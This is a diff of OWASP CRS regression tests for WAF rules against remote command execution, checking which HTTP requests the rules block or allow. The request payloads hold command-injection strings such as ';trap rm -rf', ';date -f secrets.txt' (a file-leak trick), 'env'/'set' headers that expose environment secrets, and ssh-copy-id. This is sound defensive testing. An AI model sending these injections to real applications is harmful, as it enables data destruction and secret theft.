diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932235.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932235.yaml index e9cf92a2a3..ecb2e7b16a 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932235.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932235.yaml @@ -913,3 +913,40 @@ tests: output: log: expect_ids: [932235] + - test_id: 52 + desc: "Match ;trap 'rm -rf file.txt' SIGEXIT" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.1 + data: "arg=%3Btrap%20%27rm%20-rf%20file.txt%27%20SIGEXIT" + output: + log: + expect_ids: [932235] + - test_id: 53 + desc: | + False Positive: + Don't block invalid command `null` (Might come from unix-shell.data) + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.1 + data: | + code=time null space + output: + log: + no_expect_ids: [932235] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932236.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932236.yaml index ab0112299a..eaaece17e5 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932236.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932236.yaml @@ -585,26 +585,6 @@ tests: log: expect_ids: [932236] - test_id: 32 - desc: RCE ;top with html entities two digit decimal of 59 (;) - stages: - - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=%26%2359%3B+;top" - version: HTTP/1.1 - output: - log: - expect_ids: [932236] - - test_id: 33 desc: Like rule True Negative Rule Integrity 9 but the html entity is concatenation with RCE at the end stages: - input: @@ -624,7 +604,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 34 + - test_id: 33 desc: Like rule True Negative Rule Integrity 9 but the html entity is concatenation with RCE at the beginning stages: - input: @@ -644,7 +624,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 35 + - test_id: 34 desc: Like rule True Negative Rule Integrity 10 but the html entity is concatenation with RCE at the end stages: - input: @@ -664,7 +644,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 36 + - test_id: 35 desc: Like rule True Negative Rule Integrity 10 but the html entity is concatenation with RCE at the beginning stages: - input: @@ -684,7 +664,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 37 + - test_id: 36 desc: Like rule True Negative Rule Integrity 11 but the html entity is concatenation with RCE at the beginning stages: - input: @@ -704,7 +684,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 38 + - test_id: 37 desc: "Unix command injection" stages: - input: @@ -721,7 +701,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 39 + - test_id: 38 desc: "Unix command injection" stages: - input: @@ -738,7 +718,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 40 + - test_id: 39 stages: - input: dest_addr: "127.0.0.1" @@ -753,7 +733,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 41 + - test_id: 40 stages: - input: dest_addr: "127.0.0.1" @@ -769,7 +749,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 42 + - test_id: 41 desc: Remote Command Injection test for BB finding 935E1D91 stages: - input: @@ -787,7 +767,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 43 + - test_id: 42 desc: Remote Command Injection test for BB finding 935E1D91 - time evasion attempt stages: - input: @@ -805,7 +785,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 44 + - test_id: 43 desc: "FP with word comment" stages: - input: @@ -821,7 +801,7 @@ tests: output: log: no_expect_ids: [932236] - - test_id: 45 + - test_id: 44 desc: "FP with word settings" stages: - input: @@ -837,7 +817,7 @@ tests: output: log: no_expect_ids: [932236] - - test_id: 46 + - test_id: 45 desc: False positive against "time" stages: - input: @@ -856,7 +836,7 @@ tests: output: log: no_expect_ids: [932236] - - test_id: 47 + - test_id: 46 desc: False positive against "more" stages: - input: @@ -875,7 +855,7 @@ tests: output: log: no_expect_ids: [932236] - - test_id: 48 + - test_id: 47 desc: "FP with word environment" stages: - input: @@ -891,7 +871,7 @@ tests: output: log: no_expect_ids: [932236] - - test_id: 49 + - test_id: 48 desc: "FP with word performance" stages: - input: @@ -907,7 +887,7 @@ tests: output: log: no_expect_ids: [932236] - - test_id: 50 + - test_id: 49 desc: "Block execution of env command with arguments" stages: - input: @@ -924,7 +904,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 51 + - test_id: 50 desc: "Block execution of perf command with arguments" stages: - input: @@ -941,7 +921,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 52 + - test_id: 51 desc: "Block evasion using here string" stages: - input: @@ -959,7 +939,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 53 + - test_id: 52 desc: "Block evasion using here string with space" stages: - input: @@ -977,7 +957,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 54 + - test_id: 53 desc: "Block evasion using here string with single quotes" stages: - input: @@ -995,7 +975,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 55 + - test_id: 54 desc: "Block evasion using here string with double quotes" stages: - input: @@ -1013,7 +993,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 56 + - test_id: 55 desc: "Block evasion using here string with command substitution" stages: - input: @@ -1031,7 +1011,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 57 + - test_id: 56 desc: "Block `time` prefix" stages: - input: @@ -1049,7 +1029,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 58 + - test_id: 57 desc: "Block `strace` prefix" stages: - input: @@ -1067,7 +1047,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 59 + - test_id: 58 desc: "Known false positive with `Cut` at start of string (expected failure)" stages: - input: @@ -1085,7 +1065,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 60 + - test_id: 59 desc: "Known false positive with `Wall` at start of string" stages: - input: @@ -1102,8 +1082,8 @@ tests: sentence=Wall Street\\xe2\\x80\\x99s benchmark stock index struck an all-time high on Tuesday. output: log: - no_expect_ids: [932236] - - test_id: 61 + expect_ids: [932236] + - test_id: 60 desc: "Known false positive with `Mount` at start of string (expected failure)" stages: - input: @@ -1121,7 +1101,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 62 + - test_id: 61 desc: "Fixed false positive with `As` at start of string" stages: - input: @@ -1139,7 +1119,7 @@ tests: output: log: no_expect_ids: [932236] - - test_id: 63 + - test_id: 62 desc: "Fixed false positive with `At` at start of string" stages: - input: @@ -1157,7 +1137,7 @@ tests: output: log: no_expect_ids: [932236] - - test_id: 64 + - test_id: 63 desc: "Block `nohup` prefix" stages: - input: @@ -1175,7 +1155,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 65 + - test_id: 64 desc: "Block ad-hoc ansible commands" stages: - input: @@ -1193,7 +1173,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 66 + - test_id: 65 desc: "Block ansible config dump command" stages: - input: @@ -1211,7 +1191,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 67 + - test_id: 66 desc: "Block installing collections from ansible galaxy" stages: - input: @@ -1229,7 +1209,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 68 + - test_id: 67 desc: "Block ad-hoc ansible commands using ansible-console" stages: - input: @@ -1247,7 +1227,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 69 + - test_id: 68 desc: "Block ansible-doc command" stages: - input: @@ -1265,7 +1245,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 70 + - test_id: 69 desc: "Block dumping ansible inventory file and variables" stages: - input: @@ -1283,7 +1263,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 71 + - test_id: 70 desc: "Block ansible pull from remote repository" stages: - input: @@ -1301,7 +1281,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 72 + - test_id: 71 desc: "Block decrypting ansible secrets" stages: - input: @@ -1319,7 +1299,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 73 + - test_id: 72 desc: "Block execution of ansible playbooks" stages: - input: @@ -1337,7 +1317,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 74 + - test_id: 73 desc: "Block decryption of secrets with chef-vault" stages: - input: @@ -1355,7 +1335,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 75 + - test_id: 74 desc: "Block execution of chef-shell command" stages: - input: @@ -1373,7 +1353,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 76 + - test_id: 75 desc: "Block execution chef recipie book" stages: - input: @@ -1391,7 +1371,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 77 + - test_id: 76 desc: "Block execution chef recipie book against a specific node" stages: - input: @@ -1409,7 +1389,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 78 + - test_id: 77 desc: "Block execution chef command" stages: - input: @@ -1427,7 +1407,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 79 + - test_id: 78 desc: "Block execution of visudo" stages: - input: @@ -1445,7 +1425,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 80 + - test_id: 79 desc: "Block execution of CrowdSec cscli" stages: - input: @@ -1463,7 +1443,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 81 + - test_id: 80 desc: "False positive with session cookie, invalid command match with sudo" stages: - input: @@ -1480,7 +1460,7 @@ tests: output: log: no_expect_ids: [932236] - - test_id: 82 + - test_id: 81 desc: "False positive with session cookie, invalid command match with fd" stages: - input: @@ -1497,7 +1477,7 @@ tests: output: log: no_expect_ids: [932236] - - test_id: 83 + - test_id: 82 desc: "False positive with UUID" stages: - input: @@ -1515,7 +1495,7 @@ tests: output: log: no_expect_ids: [932236] - - test_id: 84 + - test_id: 83 desc: "False positive with word identity" stages: - input: @@ -1533,7 +1513,7 @@ tests: output: log: no_expect_ids: [932236] - - test_id: 85 + - test_id: 84 desc: "False positive with word unique" stages: - input: @@ -1551,7 +1531,7 @@ tests: output: log: no_expect_ids: [932236] - - test_id: 86 + - test_id: 85 desc: "False positive with common argument value/name `id`." stages: - input: @@ -1569,7 +1549,7 @@ tests: output: log: no_expect_ids: [932236] - - test_id: 87 + - test_id: 86 desc: | false positive with Nextcloud Mail widget. Should not match `mail`. @@ -1589,7 +1569,7 @@ tests: output: log: no_expect_ids: [932236] - - test_id: 88 + - test_id: 87 desc: | False positive with WordPress ordering posts by date. Should not match `date`. @@ -1610,7 +1590,7 @@ tests: output: log: no_expect_ids: [932236] - - test_id: 89 + - test_id: 88 desc: "Block execution of shutdown command." stages: - input: @@ -1628,7 +1608,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 90 + - test_id: 89 desc: "Don't match very long permutations of commands when using ~" stages: - input: @@ -1646,7 +1626,7 @@ tests: output: log: no_expect_ids: [932236] - - test_id: 91 + - test_id: 90 desc: "Block Execution of pip3 command" stages: - input: @@ -1664,7 +1644,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 92 + - test_id: 91 desc: "Block Execution of pipx command" stages: - input: @@ -1682,7 +1662,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 93 + - test_id: 92 desc: "False Positive: matching pipe `self`" stages: - input: @@ -1700,8 +1680,24 @@ tests: output: log: no_expect_ids: [932236] + - test_id: 93 + desc: "True Positive: Block pip command" + stages: + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?param=pip%20install%20something" + version: "HTTP/1.1" + output: + log: + expect_ids: [932236] - test_id: 94 - desc: "Ensure that `rc` is matched PL 2" + desc: "Match `ssh-copy-id`" stages: - input: dest_addr: 127.0.0.1 @@ -1709,31 +1705,32 @@ tests: Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Host: localhost User-Agent: "OWASP CRS test agent" - method: GET + method: POST port: 80 - uri: "/get?param=rc" + uri: "/post" version: HTTP/1.1 + data: "arg=;ssh-copy-id%20user@server" output: log: expect_ids: [932236] - test_id: 95 - desc: "True Positive: Block pip command" + desc: "Block 'rc' command" stages: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 + dest_addr: 127.0.0.1 headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?param=pip%20install%20something" - version: "HTTP/1.1" + method: GET + port: 80 + uri: "/get?param=rc%20script.sh" + version: HTTP/1.1 output: log: expect_ids: [932236] - test_id: 96 - desc: "Match `ssh-copy-id`" + desc: "TEST=echo | gcc7.4" stages: - input: dest_addr: 127.0.0.1 @@ -1744,8 +1741,46 @@ tests: method: POST port: 80 uri: "/post" + data: "TEST=echo | gcc7.4" version: HTTP/1.1 - data: "arg=;ssh-copy-id%20user@server" + output: + log: + expect_ids: [932236] + - test_id: 97 + desc: | + Block execution of date command `;date -f secrets.txt` + The error message from the date command can be abused to leak the contents of a file + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.1 + data: "arg=;date%20-f%20secrets.txt" + output: + log: + expect_ids: [932236] + - test_id: 98 + desc: | + Block execution of date command `;date --file secrets.txt` + The error message from the date command can be abused to leak the contents of a file + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.1 + data: "arg=;date%20--file%20secrets.txt" output: log: expect_ids: [932236] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml index ec11685edd..9e6af995b2 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml @@ -4,36 +4,6 @@ meta: rule_id: 932237 tests: - test_id: 1 - stages: - - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: env - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: HTTP/1.1 - output: - log: - expect_ids: [932237] - - test_id: 2 - stages: - - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: id - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: HTTP/1.1 - output: - log: - expect_ids: [932237] - - test_id: 3 stages: - input: dest_addr: "127.0.0.1" @@ -48,7 +18,7 @@ tests: output: log: expect_ids: [932237] - - test_id: 4 + - test_id: 2 stages: - input: dest_addr: "127.0.0.1" @@ -63,7 +33,7 @@ tests: output: log: no_expect_ids: [932237] - - test_id: 5 + - test_id: 3 stages: - input: dest_addr: "127.0.0.1" @@ -78,39 +48,7 @@ tests: output: log: no_expect_ids: [932237] - - test_id: 6 - stages: - - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Referer: env - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: HTTP/1.1 - output: - log: - expect_ids: [932237] - - test_id: 7 - stages: - - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Referer: id - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: HTTP/1.1 - output: - log: - expect_ids: [932237] - - test_id: 8 + - test_id: 4 stages: - input: dest_addr: "127.0.0.1" @@ -126,7 +64,7 @@ tests: output: log: expect_ids: [932237] - - test_id: 9 + - test_id: 5 stages: - input: dest_addr: "127.0.0.1" @@ -142,7 +80,7 @@ tests: output: log: no_expect_ids: [932237] - - test_id: 10 + - test_id: 6 stages: - input: dest_addr: "127.0.0.1" @@ -158,7 +96,7 @@ tests: output: log: no_expect_ids: [932237] - - test_id: 11 + - test_id: 7 desc: "9323HNQU - should not be detected at PL 2" stages: - input: @@ -176,7 +114,7 @@ tests: output: log: no_expect_ids: [932237] - - test_id: 12 + - test_id: 8 desc: "9323HNQU - should not be detected at PL 2" stages: - input: @@ -194,7 +132,7 @@ tests: output: log: no_expect_ids: [932237] - - test_id: 13 + - test_id: 9 desc: "FP with word comment" stages: - input: @@ -210,7 +148,7 @@ tests: output: log: no_expect_ids: [932237] - - test_id: 14 + - test_id: 10 desc: "FP with word settings" stages: - input: @@ -226,38 +164,7 @@ tests: output: log: no_expect_ids: [932237] - - test_id: 15 - stages: - - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Referer: set - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: HTTP/1.1 - output: - log: - expect_ids: [932237] - - test_id: 16 - stages: - - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: set - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: HTTP/1.1 - output: - log: - expect_ids: [932237] - - test_id: 17 + - test_id: 11 desc: "Block env command with arguments" stages: - input: @@ -273,7 +180,7 @@ tests: output: log: expect_ids: [932237] - - test_id: 18 + - test_id: 12 desc: "Block env command with arguments" stages: - input: @@ -290,7 +197,7 @@ tests: output: log: expect_ids: [932237] - - test_id: 19 + - test_id: 13 desc: "Block ad-hoc ansible commands" stages: - input: @@ -306,7 +213,7 @@ tests: output: log: expect_ids: [932237] - - test_id: 20 + - test_id: 14 desc: "Block ansible config dump command" stages: - input: @@ -322,7 +229,7 @@ tests: output: log: expect_ids: [932237] - - test_id: 21 + - test_id: 15 desc: "Block installing collections from ansible galaxy" stages: - input: @@ -338,7 +245,7 @@ tests: output: log: expect_ids: [932237] - - test_id: 22 + - test_id: 16 desc: "Block ad-hoc ansible commands using ansible-console" stages: - input: @@ -354,7 +261,7 @@ tests: output: log: expect_ids: [932237] - - test_id: 23 + - test_id: 17 desc: "Block ansible-doc command" stages: - input: @@ -370,7 +277,7 @@ tests: output: log: expect_ids: [932237] - - test_id: 24 + - test_id: 18 desc: "Block dumping ansible inventory file and variables" stages: - input: @@ -386,7 +293,7 @@ tests: output: log: expect_ids: [932237] - - test_id: 25 + - test_id: 19 desc: "Block ansible pull from remote repository" stages: - input: @@ -402,7 +309,7 @@ tests: output: log: expect_ids: [932237] - - test_id: 26 + - test_id: 20 desc: "Block decrypting ansible secrets" stages: - input: @@ -418,7 +325,7 @@ tests: output: log: expect_ids: [932237] - - test_id: 27 + - test_id: 21 desc: "Block execution of ansible playbooks" stages: - input: @@ -434,7 +341,7 @@ tests: output: log: expect_ids: [932237] - - test_id: 28 + - test_id: 22 desc: "Block decryption of secrets with chef-vault" stages: - input: @@ -450,7 +357,7 @@ tests: output: log: expect_ids: [932237] - - test_id: 29 + - test_id: 23 desc: "Block execution of chef-shell command" stages: - input: @@ -466,7 +373,7 @@ tests: output: log: expect_ids: [932237] - - test_id: 30 + - test_id: 24 desc: "Block execution chef recipie book" stages: - input: @@ -482,7 +389,7 @@ tests: output: log: expect_ids: [932237] - - test_id: 31 + - test_id: 25 desc: "Block execution chef recipie book against a specific node" stages: - input: @@ -498,7 +405,7 @@ tests: output: log: expect_ids: [932237] - - test_id: 32 + - test_id: 26 desc: "Block execution chef command" stages: - input: @@ -514,7 +421,7 @@ tests: output: log: expect_ids: [932237] - - test_id: 33 + - test_id: 27 desc: "Block execution of visudo" stages: - input: @@ -530,7 +437,7 @@ tests: output: log: expect_ids: [932237] - - test_id: 34 + - test_id: 28 desc: "Block execution of CrowdSec cscli" stages: - input: @@ -546,7 +453,7 @@ tests: output: log: expect_ids: [932237] - - test_id: 35 + - test_id: 29 desc: | False positive with Nextcloud iOS user-agent. Should not match `ip`. @@ -564,7 +471,7 @@ tests: output: log: no_expect_ids: [932237] - - test_id: 36 + - test_id: 30 desc: | False positive with token in referrer. Should not match `df`. @@ -583,7 +490,7 @@ tests: output: log: no_expect_ids: [932237] - - test_id: 37 + - test_id: 31 desc: | False positive with Android user-agent. Should not match `pg`. @@ -601,7 +508,7 @@ tests: output: log: no_expect_ids: [932237] - - test_id: 38 + - test_id: 32 desc: | False positive with Pashto Afghanistan User-Agent Should not match `ps` in `ps-af`. @@ -619,3 +526,21 @@ tests: output: log: no_expect_ids: [932237] + - test_id: 33 + desc: "Negative test on known user-agent" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "Cpanel-HTTP-Client/1.0" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932237] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932340.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932340.yaml new file mode 100644 index 0000000000..68c163d309 --- /dev/null +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932340.yaml @@ -0,0 +1,170 @@ +--- +meta: + author: "Esad Cetiner, Max Leske, Franziska Bühler" +rule_id: 932340 +tests: + - test_id: 1 + desc: "/?arg=;ps" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=%3Bps" + version: HTTP/1.1 + output: + log: + expect_ids: [932340] + - test_id: 2 + desc: | + Block execution of `env` command + This could be used to leak passwords set as environment variable in docker based environments + stages: + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: env + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: HTTP/1.1 + output: + log: + expect_ids: [932340] + - test_id: 3 + desc: | + Block execution of `env` command + This could be used to leak passwords set as environment variable in docker based environments + stages: + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Referer: env + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: HTTP/1.1 + output: + log: + expect_ids: [932340] + - test_id: 4 + desc: | + Block execution of `set` command + This could be used to leak passwords set as environment variable in docker based environments + stages: + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Referer: set + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: HTTP/1.1 + output: + log: + expect_ids: [932340] + - test_id: 5 + desc: | + Block execution of `set` command + This could be used to leak passwords set as environment variable in docker based environments + stages: + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: set + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: HTTP/1.1 + output: + log: + expect_ids: [932340] + - test_id: 6 + desc: "/?arg=&aptitude" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=%26aptitude" + version: HTTP/1.1 + output: + log: + expect_ids: [932340] + - test_id: 7 + desc: | + False Positive with `id` command + `id` is a very common parameter name + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "id=4" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932340] + - test_id: 8 + desc: | + False Positive with `pwd` command + `pwd` is a common parameter name for passwords + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "pwd=supersecurepassword" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932340] + - test_id: 9 + desc: | + False Positive with `uname` command + `uname` is a common parameter name for usernames + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "uname=john%20doe" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932340] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932350.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932350.yaml new file mode 100644 index 0000000000..93806d25eb --- /dev/null +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932350.yaml @@ -0,0 +1,81 @@ +--- +meta: + author: "Esad Cetiner, Max Leske" +rule_id: 932350 +tests: + - test_id: 1 + desc: | + Block execution of `id` command + `id` is a very common parameter name so we only block at PL-3 + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "id=4" + version: HTTP/1.1 + output: + log: + expect_ids: [932350] + - test_id: 2 + desc: | + Block execution of `id` command + `id` is a very common parameter name so we only block at PL-3 + stages: + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Referer: id + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: HTTP/1.1 + output: + log: + expect_ids: [932350] + - test_id: 3 + desc: | + Block execution of `id` command + `id` is a very common parameter name so we only block at PL-3 + stages: + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: id + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: HTTP/1.1 + output: + log: + expect_ids: [932350] + - test_id: 4 + desc: RCE ;top with html entities two digit decimal of 59 (;) + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: "arg=%26%2359%3B+;top" + version: HTTP/1.1 + output: + log: + expect_ids: [932350] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933111.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933111.yaml index 9901ec55e1..7c6ca95ae2 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933111.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933111.yaml @@ -1,6 +1,6 @@ --- meta: - author: "NiceYouKnow, azurit" + author: "NiceYouKnow, azurit, touchweb_vincent" rule_id: 933111 tests: - test_id: 1 @@ -28,3 +28,53 @@ tests: output: log: expect_ids: [933111] + - test_id: 2 + desc: "PHP Injection Attack: PHP Script File Upload Found" + stages: + - input: + dest_addr: 127.0.0.1 + 